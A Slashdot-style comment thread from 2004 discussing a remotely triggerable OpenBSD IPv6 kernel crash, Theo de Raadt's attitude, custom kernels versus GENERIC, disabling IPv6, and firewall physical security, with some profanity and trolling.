Tha analogy would be the way the press treat road and rail accidents. In the UK (BTW no passengers at all were killed in crashes last year) it is headline news for weeks, and then again all through the inevitable pubilc enquiry if 4 people are killed in a train crash, yet IIRC on the same day, or maybe the bnext day as 4 were killed in the crash I am thinking of, at least 10 died on the roads, 6 in one vehicle. That one got a small paragraph.... The average is 10 a day in the UK on the roads, about 2 or 3 per year in trains.

Now the specialist press, including web sites, who know of the existence of OpenBSD, are likely to treat this in much the same way. A BSD crash, any variant, is a rarity, 1000 times or more less likely to happen than a BSOD. Same sort of ratio fro security holes also. So, the same thing happens, the uncommon major event gets the attention, although it does far, far less harm overall than the very common everyday event.

Of course in this case the normal press remain in utter ignorance, some of them may know that Windoze is not the same as a MAC, a few will know of Linux, and very few indeed will know what BSD is, they probably think it is a shorter abbreviation for BSOD. So, the mainstream press will leave this well alone.

It is quite right and proper that crashes should be reported, and certainly it is only fair that a problem with a secure OS gets to be known, and fixed, but like the train crash, it needs to be kept in perspective.

I know that Theo allegedly has an attitude problem, however those who extrapolate from his remark that it is only a crash to suggest that he does not care are IMHO quite wrong. I think he was only putting the event in its true perspective, as being of slightly less importance than a security breach. I think he does care, very much, that "his" software works properly, that is what drives such people, who could earn much more financial reward elsewhere.

All of this is a matter of seeing the thing in its true perspective. If people did that, no-one at all would use the products of the Convicted Monopolist, and the world would be a very much safer place as regards computer security, and much more productive because there would probably be only one crash for 1000 or even 1000000 BSODs in inferior systems, which are riddled with fundamental design errors.

Re:Maybe time to drop this "securitier than thou"

[Tom7]

If they want a system with users, it helps to not turn then away by being rude and dismissive.
Users are good for lots of goals, because users find, report, and sometimes fix bugs.
If they want cooperation from other OS/app writers, it helps to be less competitive. I know these aren't *directly* on the list, but surely they contribute indirectly to the goals.

Just as you defend Theo's right to say things like that, should I not also have the right to call him on his attitude?

Out of context?

[emil]

I find it hard to believe that anything taken out of context could be worse than what he says in context:

We're sick and tired of talking. Around here we do things. And we do it how we like it. And I am not going to change my processes for you. I make release when *I WANT TO*. And I WANT TO make them every 6 months, and that is that. So stop acting as if this is a democratic process. I'm the one doing the release work, so get stuffed.

Granted, OpenBSD is his baby.

OpenBSD binpatch?

[emil]

Is there any way that we could prod Santana to bring his binary patches up to date for 3.3 i386 when the patch is released?

I've already emailed him that I'd send him $50.

This may be true, but...

[emil]

...the documentation advises against building your own kernel unless you have a very good reason. They won't support you, either (not that their support will solve all your problems).

Under most circumstances you will NOT need to compile your own kernel. The GENERIC kernel will usually be all that you need. In fact, there are several reasons why you do not want to create your own kernel. The main reason is that it is very easy to make changes to the kernel configuration which look logical, but do not work. This is your danger sign. If something does not appear to work properly, please try the GENERIC kernel before sending in a bug report. Developers will usually ignore bug reports dealing with custom kernels, unless the problem can be reproduced in a GENERIC kernel as well. You have been warned.

Re:This may be true, but...

[drinkypoo]

They don't offer support. They do, however, accept bug reports when it can be verified that you haven't fucked something up. Users who have demonstrated that they are clueful will be allowed to file bug reports, but the quality of the bug report will have to go up.

You didn't know Theo isn't afraid for people to think he's a dick? Sure it colors the whole project (black?) but don't be so needlessly dramatic. I wouldn't take bug reports from some random yahoo unless I was sure they didn't cause it through their twiddling, either, and if I were feeling lazy I wouldn't want to read their config file either.

I'm sure both IPv6 users have patched by now

[bee]

C'mon, how many people are running IPv6? I'm sure both of them have upgraded to -current already.

Then explain how.

If you are gonna sit there and talk out of your ass about how removing IPv6 from your kernel has any benefit at all, you should back it up. It won't affect performance or security, so wtf is it helping? If you don't use IPv6, nobody can connect via IPv6, and therefore its not any more secure to remove IPv6. In fact, it may be less secure as GENERIC kernels are by far the most widely used and tested, and there could be unintended and unknown issues with ganking out part of the kernel for no fucking reason.

Re:Then explain how.

[hdw]

Every added feature adds risk for bugs.
If I don't use a feature I turn it off.
In this case I know that I'm not using IPv6, but there might very well be IPv6 traffic around my firewalls.
Even if noone can connect over IPv6, it doesn't mean that IPv6 packets will not be processed by my kernel.
Can you really say that disabling IPv6 support in the kernel does not affect security?
The code standard in OpenBSD is very high, but it's not bug free. And a bug in disabled code is a bug that can't bite me.
And I don't 'gank' anything out, I use the configuration file exactly as it's supposed to be used.
Everytime there's a new release I reinstall my build server, then I go over rc.conf, sysctl.conf and kernel conf adding the options I need, removing the stuff I don't need and build my internal release.
// hdw

Re:Then explain how.

[Dj+Offset]

And a bug in disabled code is a bug that can't bite me. How about the bugs you might create by removing or disabling stuff without careful consideration?

Re:Then explain how.

[hdw]

Uh?
The bug I create by switching an option in a config file from on to off?
The point of having options in the config file is that you're supposed to config the kernel to your needs.
Switching unused options off is careful consideration.
// hdw

Re:Why does "remote hole" == elevation of privileg

It is not, however, in the default configuration, which is what they generally boast about. Thus, what you said is moot.

Re:Maybe time to drop this "securitier than thou"

[LearnToSpell]

http://bsd.slashdot.org/article.pl?sid=04/02/05/20 56234
Remotely Crash OpenBSD
Posted by CowboyNeal on Thu Feb 05, '04 22:49

http://www.openbsd.org/cgi-bin/cvsweb/src/sys/neti net6/ip6_output.c
CVS log for src/sys/netinet6/ip6_output.c
Revision 1.82 / (download) - annotate - [select for diffs] , Wed Feb 4 08:47:41 2004

Get it?

Re:You need some help getting your head out of the

No, of course not. I know that they take security seriously at OpenBSD, I just don't think they should be such cocks about it.

MSFT Can't Win

Forgetting corporate inertia for a moment, you have the choice of hurried, not thoroughly tested, patches; or waiting weeks while they test it thoroughly.

Think of the sheer number of test cases. You've got how many different versions of Windows still supported. Multiply that by all the apps MSFT sells (e.g.: Office) and all the apps that major corporations also run (e.g. Oracle). Multiply by a few hundred hardware platfroms.

I'm not particulary fond of MSFT myself, but complaining about the speed AND quality of their patches reflects poorly on you.

Re:Why does "remote hole" == elevation of privileg

ay dios mio, carajo cabron

Re:Why does "remote hole" == elevation of privileg

I have, on this very desk right now, a box running a stock, unmodified, out-of-the-box, default install of OpenBSD 3.4, which was just installed a few months ago.

It has IPV6 enabled.

Please look into these things before you post about them.

*bsd IS DYING

not news really, but I thought that you'd love to hear about it.

This message has been confirmed by Netcraft.

Physical access = no security

[gottabeme]

Doesn't that violate the first rule of security: restrict physical access? If anyone can walk in and access the firewalls/routers, they could do whatever they want to them, OpenBSD or not.

Re:Physical access = no security

[evilviper]

They don't have the kind of access they would need to do anything with... There is no floppy or CD-Rom. There is no keyboard or monitor attached. There is a password on the bios. But most importantly, this device is in a high traffic area. It would take several minutes for anybody to do something malicious, and they'd be seen by numerous people in a matter of seconds.

Now, if you don't have a similar situation, you could always have it locked-up, so that just the reset button is exposed. Or maybe you could have it locked-up, but have it plugged-in to a surge protector with an accessibly switch.

Besides that, security in the real world is a trade-off... Physical security is a must if you have data or machines that need to be protected, but a firewall isn't always that critical of a device (no servers are behind it, etc).

Re:Physical access = no security

It would only take a few seconds to completely replace it with another box that looked like it, but that was configured to do nearly anything... Where was this box again? he he he

Re:Physical access = no security

[evilviper]

It would only take a few seconds to completely replace it with another box that looked like it,

No, it's in a rack where the cables aren't easily accessible. It takes me a bare minimum of 5 minutes to disconnect it (and quite a bit longer to re-connect it) and that's after I've done it several times.

Besides that, you wouldn't know the exact firewall rules on the box, so it would be revealed as a fake in no time. You also couldn't quite duplicate my handwriting on the faceplate.

Besides, it's a moot point since the two exits are highly visible. There are much more valuable things in that building than this router!

Cool.

[gottabeme]

I see. Interesting. :)

Re:Maybe time to drop this "securitier than thou"

[IcePic]

There is a difference between:
"He should do X" and
"I think he shoudl do X to achieve Y".
Especially when Y isn't on the goals.html page.
Yes, more users would seem logical, but it's not one
of the goals. Reread it and you'll see.

fp (400th post)

FP! (400th post)

YHBT

[^BR]

See Daniel Harmeier answer.

Basically OpenBSD releases are supported one year (2 releases). i.e. you have to upgrade only any other release. In fact a release is supported for 13 months to give users a 1 month window to upgrade.

At the time of the telnetd exploit (July 2001) the oldest supported release was 2.7 or 2.8 and telnetd had been disabled from the default install between 2.5 and 2.6. So if you used a supported release you were safe. Since upgrades are free and take about one hour there's no reason not to do it once a year...

This dead bitch is getting smelly...

Crash the corpse and get some good Tux action happening on your machines.